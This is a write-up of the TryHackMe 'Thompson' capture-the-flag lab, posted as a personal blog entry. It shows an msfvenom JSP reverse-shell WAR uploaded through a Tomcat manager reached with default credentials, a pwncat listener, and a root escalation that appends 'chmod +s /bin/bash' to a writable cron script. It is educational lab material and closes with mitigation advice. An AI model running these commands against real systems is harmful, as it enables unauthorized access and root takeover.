Thompson Write-Up

Description

Thompson is a boot2root CTF on TryHackMe rated “Easy”. Initial access is gained by uploading a reverse shell through the Tomcat manager. Privilege escalation to root is achieved through a misconfigured cronjob.

Enumeration

After running an Nmap scan we can see that ports 22, 8009 and 8080 are open. On port 8080 Tomcat 8.5.5 is running.

nmap -sC -sV -O -oN nmap/scripts 10.10.39.116

The landing page of the Tomcat server shows us the default Tomcat page.

We can log into the Management portal via default credentials.

Now we have enough privileges to upload a reverse shell.

Initial access

The reverse shell was created with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your tun0 IP> LPORT=4444 -f war > shell.war

Now we can upload the reverse shell through the web portal.

After the upload the WAR file should be deployed and reachable under /shell.

Before navigating to /shell we have to start a listener. For this purpose I will use pwncat.

pc -lp 4444

Next we can navigate to “http://10.10.39.116:8080/shell/” and get a shell on the box as the tomcat user.

We can now navigate to /home/jack and get the user flag.

Privilege Escalation

Inside Jack’s home folder there are two interesting files. The first one is “id.sh”. It is a bash script that runs the id command and writes the output into “test.txt”. Reading “test.txt” shows us that this script was run by root.

Based on this information we can assume that a cronjob is running. To validate our assumption we can read the /etc/crontab file. And indeed, “id.sh” is run as root by a cronjob.

We also have write permission on the file “id.sh”. This means we can append our own command to “id.sh” and, the next time the cronjob runs, get a root shell. I will add the SUID bit to /bin/bash.

echo 'chmod +s /bin/bash' >> id.sh

After waiting for a minute, bash should have the SUID bit set.

Finally we can spawn a root shell and read the root flag.

/bin/bash -p

Mitigation

Default passwords should be changed as soon as possible. Furthermore, the Tomcat version is very old, so it should be updated if possible. Also, scripts that are run by a cronjob should only be writable by the user the cronjob runs them as.

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

Rabbit